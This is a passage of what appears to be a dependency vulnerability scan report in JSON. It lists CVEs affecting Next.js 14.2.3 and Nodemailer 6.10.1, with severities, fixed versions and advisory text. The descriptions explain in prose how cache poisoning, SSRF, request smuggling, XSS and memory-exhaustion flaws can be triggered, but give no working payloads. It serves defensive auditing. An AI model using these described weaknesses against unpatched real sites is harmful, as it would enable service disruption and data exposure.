"Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57752", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a", + "Title": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", + "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-524" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 6.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-57752", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", + "https://github.com/vercel/next.js/pull/82114", + "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-57752", + "https://vercel.com/changelog/cve-2025-57752", + "https://www.cve.org/CVERecord?id=CVE-2025-57752" + ], + "PublishedDate": "2025-08-29T22:15:31.963Z", + "LastModifiedDate": "2025-09-08T16:43:50.33Z" + }, + { + "VulnerabilityID": "CVE-2025-57822", + "VendorIDs": [ + "GHSA-4342-x723-ch2f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.32, 15.4.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57822", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1", + "Title": "Next.js Improper Middleware Redirect Handling Leads to SSRF", + "Description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8", + "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f", + "https://nvd.nist.gov/vuln/detail/CVE-2025-57822", + "https://vercel.com/changelog/cve-2025-57822" + ], + "PublishedDate": "2025-08-29T22:15:32.143Z", + "LastModifiedDate": "2025-09-08T16:41:41.253Z" + }, + { + "VulnerabilityID": "CVE-2025-59471", + "VendorIDs": [ + "GHSA-9g9p-9gw9-jx7f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.10, 16.1.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-59471", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11", + "Title": "next: NextJS Denial of Service in Image Optimizer", + "Description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-59471", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c", + "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec", + "https://github.com/vercel/next.js/releases/tag/v15.5.10", + "https://github.com/vercel/next.js/releases/tag/v16.1.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f", + "https://nvd.nist.gov/vuln/detail/CVE-2025-59471", + "https://www.cve.org/CVERecord?id=CVE-2025-59471" + ], + "PublishedDate": "2026-01-26T22:15:52.89Z", + "LastModifiedDate": "2026-02-13T15:03:20.29Z" + }, + { + "VulnerabilityID": "CVE-2026-27980", + "VendorIDs": [ + "GHSA-3x4c-7xq6-9pq8" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "16.1.7, 15.5.14", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27980", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f", + "Title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "V40Score": 6.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27980", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd", + "https://github.com/vercel/next.js/releases/tag/v16.1.7", + "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27980", + "https://www.cve.org/CVERecord?id=CVE-2026-27980" + ], + "PublishedDate": "2026-03-18T01:16:04.957Z", + "LastModifiedDate": "2026-03-18T19:52:54.307Z" + }, + { + "VulnerabilityID": "CVE-2026-29057", + "VendorIDs": [ + "GHSA-ggv3-7p47-pfv8" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "16.1.7, 15.5.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29057", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f", + "Title": "next.js: Next.js: HTTP request smuggling in rewrites", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-444" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 6.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29057", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6", + "https://github.com/vercel/next.js/releases/tag/v15.5.13", + "https://github.com/vercel/next.js/releases/tag/v16.1.7", + "https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29057", + "https://www.cve.org/CVERecord?id=CVE-2026-29057" + ], + "PublishedDate": "2026-03-18T01:16:05.443Z", + "LastModifiedDate": "2026-03-18T19:49:19.633Z" + }, + { + "VulnerabilityID": "CVE-2026-44576", + "VendorIDs": [ + "GHSA-wfc6-r584-vfw7" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44576", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb", + "Title": "Next.js vulnerable to cache poisoning in React Server Component responses", + "Description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-436" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", + "V3Score": 5.4 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44576" + ], + "PublishedDate": "2026-05-13T17:16:23.04Z", + "LastModifiedDate": "2026-05-14T13:44:18.27Z" + }, + { + "VulnerabilityID": "CVE-2026-44577", + "VendorIDs": [ + "GHSA-h64f-5h5j-jqjh" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44577", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0", + "Title": "Next.js has a Denial of Service in the Image Optimization API", + "Description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-770" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44577" + ], + "PublishedDate": "2026-05-13T17:16:23.173Z", + "LastModifiedDate": "2026-05-13T20:00:59.993Z" + }, + { + "VulnerabilityID": "CVE-2026-44580", + "VendorIDs": [ + "GHSA-gx5p-jg67-6x7h" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44580", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb", + "Title": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44580" + ], + "PublishedDate": "2026-05-13T18:16:18.26Z", + "LastModifiedDate": "2026-05-14T18:33:34.17Z" + }, + { + "VulnerabilityID": "CVE-2026-44581", + "VendorIDs": [ + "GHSA-ffhc-5mcf-pf4q" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44581", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86", + "Title": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 4.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44581" + ], + "PublishedDate": "2026-05-13T18:16:18.4Z", + "LastModifiedDate": "2026-05-14T18:30:24.34Z" + }, + { + "VulnerabilityID": "CVE-2025-32421", + "VendorIDs": [ + "GHSA-qpjv-v59x-3qc4" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.24, 15.1.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-32421", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b", + "Title": "next.js: Next.js Race Condition to Cache Poisoning", + "Description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", + "Severity": "LOW", + "CweIDs": [ + "CWE-362" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 1 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 3.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-32421", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4", + "https://nvd.nist.gov/vuln/detail/CVE-2025-32421", + "https://vercel.com/changelog/cve-2025-32421", + "https://www.cve.org/CVERecord?id=CVE-2025-32421" + ], + "PublishedDate": "2025-05-14T23:15:47.87Z", + "LastModifiedDate": "2025-09-10T15:16:10.053Z" + }, + { + "VulnerabilityID": "CVE-2025-48068", + "VendorIDs": [ + "GHSA-3h52-269p-cp9r" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.2.2, 14.2.30", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48068", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6", + "Title": "next.js: Information exposure in Next.js dev server due to lack of origin verification", + "Description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", + "Severity": "LOW", + "CweIDs": [ + "CWE-1385" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N", + "V40Score": 2.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", + "V3Score": 4.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-48068", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r", + "https://nvd.nist.gov/vuln/detail/CVE-2025-48068", + "https://vercel.com/changelog/cve-2025-48068", + "https://www.cve.org/CVERecord?id=CVE-2025-48068" + ], + "PublishedDate": "2025-05-30T04:15:48.51Z", + "LastModifiedDate": "2025-09-10T15:17:38.677Z" + }, + { + "VulnerabilityID": "CVE-2026-44572", + "VendorIDs": [ + "GHSA-3g8h-86w9-wvmq" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44572", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac", + "Title": "Next.js's Middleware / Proxy redirects can be cache-poisoned", + "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "LOW", + "CweIDs": [ + "CWE-349" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 3.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44572" + ], + "PublishedDate": "2026-05-13T16:16:58.8Z", + "LastModifiedDate": "2026-05-15T15:46:08.98Z" + }, + { + "VulnerabilityID": "CVE-2026-44582", + "VendorIDs": [ + "GHSA-vfv6-92ff-j949" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44582", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d", + "Title": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "LOW", + "CweIDs": [ + "CWE-328" + ], + "VendorSeverity": { + "ghsa": 1 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44582" + ], + "PublishedDate": "2026-05-13T18:16:19.037Z", + "LastModifiedDate": "2026-05-14T18:15:03.26Z" + }, + { + "VulnerabilityID": "CVE-2025-14874", + "VendorIDs": [ + "GHSA-rcmh-qjqh-p98v" + ], + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "7.0.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-14874", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a", + "Title": "nodemailer: Nodemailer: Denial of service via crafted email address header", + "Description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-703" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": 